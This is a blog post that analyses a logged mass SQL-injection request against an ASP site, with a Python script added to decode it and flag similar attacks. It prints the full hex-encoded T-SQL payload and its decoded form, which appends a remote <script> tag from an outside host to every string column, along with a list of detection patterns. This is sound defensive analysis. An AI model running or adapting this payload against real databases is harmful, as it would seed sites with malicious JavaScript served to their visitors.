Another Bad Person Looking for Trouble?

I found an odd-looking request in my log files:

  "/default.asp?guid=road_to_the_derby200303110002;
  declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c
  417265204054207641726368415228323535292c4063205641
  52436861522832353529204445634c415245207461426c655f
  637552736f7220635552734f5220466f722073654c65637420
  412e4e414d652c622e4e614d452066724f6d207379736f624a
  4543747320612c735973634f6c756d4e732062207768455265
  20412e69643d422e496420616e4420412e58747950653d2755
  2720616e642028622e78745970453d3939206f5220622e7854
  5970653d3335204f7220622e78745970653d323331204f5220
  422e78547950653d31363729204f70654e205441424c455f43
  7572736f52204665546368204e4578542046524f6d20744162
  6c655f435572736f7220494e546f2040542c4063207748496c
  6528404046457443485f7354615455733d302920624567696e
  20657845632827557064617445205b272b40742b275d205365
  54205b272b40432b275d3d727472494d28436f4e7645725428
  766152436841522834303030292c5b272b40432b275d29292b
  63617354283078334337333633373236393730373432303733
  37323633334436383734373437303341324632463737373737
  37324536393645363436353738364137333245373237353246
  37303631363736353245364137333345334332463733363337
  32363937303734334520415320764152436861722835322929
  2729206645746368204e4578742066726f4d205441626c655f
  635552736f7220696e744f2040742c404320654e6420434c6f
  5345205461624c655f437552734f72204445614c6c6f436174
  65207441626c655f435572736f7220%20as%20varchar(4000 ));exec(@s);--

The seemingly meaningless digits are hexadecimal: every pair encodes one ASCII character. Using http://www.string-functions.com/hex-string.aspx, I converted the hex into this string:

  /default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s=
  DeCLAre @T vArchAR(255),@c VARChaR(255)
  DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b
  whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167)
  OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0)
  bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+
  casT(0x3C736372697074207372633D687474703A2F2F7777772E696E6465786A732E72752F706167652E6A733E3C2F7363726970743E AS vARChar(52))
  ') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor
  %20as%20varchar(4000));exec(@s);--

The cast on the middle line is a second layer of the same hex trick. Decoded once more, that 0x literal is the 51-character string the payload appends to every column it touches:

  <script src=http://www.indexjs.ru/page.js></script>

It looks like they were poking around for a SQL Server instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? I wonder what would have happened if my web server did have a SQL Server instance running on the same machine (which I don't think it does) and if that .js page had run?
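What the decoded T-SQL does, for anyone reading along: it opens a cursor over every user table (A.XtyPe='U' in sysobjects) and every column of type ntext, text, nvarchar or varchar (xtype 99, 35, 231 and 167 in syscolumns), and for each pair runs UPDATE [table] SET [column] = rtrim(convert(varchar(4000), [column])) + '<script src=http://www.indexjs.ru/page.js></script>'. Every string value in the database gets the script tag appended, so any page that renders those values serves the attacker's JavaScript to its visitors. The random keyword casing and the double cast(0x...) wrapping are evasion: SQL Server is case-insensitive and decodes the hex itself, but a filter that looks for UPDATE or sysobjects in the URL sees neither. The script below reproduces the unwrapping without an online tool and checks for those traits. It is an added example written for this post, not code from the original; the only input is the logged request above, re-joined into one string on the assumption that the whitespace inside it was added by the log viewer. The indicator list and the depth cap of five layers are my own choices, and the xtype mapping is the SQL Server 2000/2005 system-catalog one; the triage checks are general enough to flag other payloads of the same family, not only this one.

```python
"""Unwrap a hex-wrapped T-SQL injection from a web log and report what it does.
Added example for this post, not code from it: REQUEST is the logged request
above, re-joined into one string with the log viewer's wrapping removed."""
import re
from urllib.parse import unquote

REQUEST = (
    "/default.asp?guid=road_to_the_derby200303110002;"
    "declare%20@s%20varchar(4000);set%20@s=cast(0x"
    "4465434c"
    "417265204054207641726368415228323535292c4063205641"
    "52436861522832353529204445634c415245207461426c655f"
    "637552736f7220635552734f5220466f722073654c65637420"
    "412e4e414d652c622e4e614d452066724f6d207379736f624a"
    "4543747320612c735973634f6c756d4e732062207768455265"
    "20412e69643d422e496420616e4420412e58747950653d2755"
    "2720616e642028622e78745970453d3939206f5220622e7854"
    "5970653d3335204f7220622e78745970653d323331204f5220"
    "422e78547950653d31363729204f70654e205441424c455f43"
    "7572736f52204665546368204e4578542046524f6d20744162"
    "6c655f435572736f7220494e546f2040542c4063207748496c"
    "6528404046457443485f7354615455733d302920624567696e"
    "20657845632827557064617445205b272b40742b275d205365"
    "54205b272b40432b275d3d727472494d28436f4e7645725428"
    "766152436841522834303030292c5b272b40432b275d29292b"
    "63617354283078334337333633373236393730373432303733"
    "37323633334436383734373437303341324632463737373737"
    "37324536393645363436353738364137333245373237353246"
    "37303631363736353245364137333345334332463733363337"
    "32363937303734334520415320764152436861722835322929"
    "2729206645746368204e4578742066726f4d205441626c655f"
    "635552736f7220696e744f2040742c404320654e6420434c6f"
    "5345205461624c655f437552734f72204445614c6c6f436174"
    "65207441626c655f435572736f7220"
    "%20as%20varchar(4000));exec(@s);--"
)

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")

# syscolumns.xtype codes the payload filters on (SQL Server 2000/2005 catalog).
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar"}

# Traits of a cursor-driven mass injection; my own list, matched case-insensitively.
INDICATORS = {
    "walks the system catalog": re.compile(r"sysobjects|syscolumns|information_schema", re.I),
    "declares a cursor": re.compile(r"declare\s+\w+\s+cursor", re.I),
    "rewrites rows": re.compile(r"\bupdate\b", re.I),
    "runs dynamic SQL": re.compile(r"\bexec\s*\(", re.I),
    "appends a script tag": re.compile(r"<script[^>]*src=", re.I),
}

def decode_hex_literals(text):
    """Replace every 0x... literal with the bytes it encodes; odd-length ones are left alone."""
    def _decode(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return HEX_LITERAL.sub(_decode, text)

def unwrap(request, max_depth=5):
    """URL-decode, then peel cast(0x...) layers; one string per layer, outermost first.
    The depth cap stops a payload that keeps yielding 0x literals from looping forever."""
    text = unquote(request)
    layers = []
    for _ in range(max_depth):
        if not HEX_LITERAL.search(text):
            break
        text = decode_hex_literals(text)
        layers.append(text)
    return layers

def targeted_column_types(sql):
    """Name the column types an 'xtype=N' filter selects, in order of appearance."""
    codes = [int(c) for c in re.findall(r"xtype\s*=\s*(\d+)", sql, re.I)]
    return [XTYPE_NAMES.get(c, f"xtype {c}") for c in codes]

def triage(request):
    """Fully decode a request and report which mass-injection traits it shows."""
    layers = unwrap(request)
    final = layers[-1] if layers else unquote(request)
    tag = re.search(r"<script[^>]*>", final, re.I)
    return {
        "layers": len(layers),
        "indicators": [name for name, pat in INDICATORS.items() if pat.search(final)],
        "column_types": targeted_column_types(final),
        "script_tag": tag.group(0) if tag else None,
    }

if __name__ == "__main__":
    for depth, sql in enumerate(unwrap(REQUEST), 1):
        print(f"--- layer {depth} ---\n{sql}\n")
    print(triage(REQUEST))
```

Run as-is it prints both decoded layers and a report showing two layers, all five indicators, the four string column types and the script tag. To run it over a whole log, feed each request path to triage() and alert on anything with two or more indicators; a single UPDATE in a URL is suspicious on its own, but the catalog walk plus a cursor is the signature of this family and does not occur in legitimate traffic.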
